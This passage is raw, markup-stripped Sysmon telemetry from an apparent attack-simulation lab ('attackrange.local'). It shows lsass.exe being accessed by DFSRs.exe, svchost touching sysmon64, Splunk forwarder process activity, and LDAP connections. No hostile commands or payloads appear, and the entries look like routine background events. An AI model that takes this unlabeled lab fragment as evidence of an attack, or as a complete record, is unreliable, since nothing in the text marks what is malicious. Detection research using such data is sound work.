10:53:48.467{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289273Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:48.467{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217209Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:49.986{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17837D3055D96AE8448C6E7CC1C2F2BC,SHA256=582E1B90B737120D8FEB3D1507B6F88614627A1E90AAADF629394FF9779C7F16,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289291Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:47.941{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53521-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000289290Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:47.941{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53521-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000289289Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:49.730{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A8740ACC3A1707975425BD5AD8A862C,SHA256=8845FDF914EE7C1C7E630AC84D1D5B912A7A11F314A1F22E166CFB923543C79E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289288Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:49.483{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289287Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:49.483{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289286Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:49.314{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289285Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:49.298{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289284Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:53:49.298{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217208Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:49.861{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-123D-6216-7104-000000003902}3136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217207Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:49.861{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217206Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:49.861{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217205Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:49.861{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217204Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:49.861{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217203Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:49.861{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217202Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:49.861{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217201Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:49.861{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217200Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:49.861{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217199Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:49.861{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217198Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:49.861{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-123D-6216-7104-000000003902}3136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217197Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:49.861{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-123D-6216-7104-000000003902}3136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217196Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:49.862{4F8D34B0-123D-6216-7104-000000003902}3136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000217195Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:49.627{4F8D34B0-123D-6216-7004-000000003902}39563132C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217194Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:49.345{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-123D-6216-7004-000000003902}3956C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217193Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:49.345{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217192Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:53:49.345{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217191Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 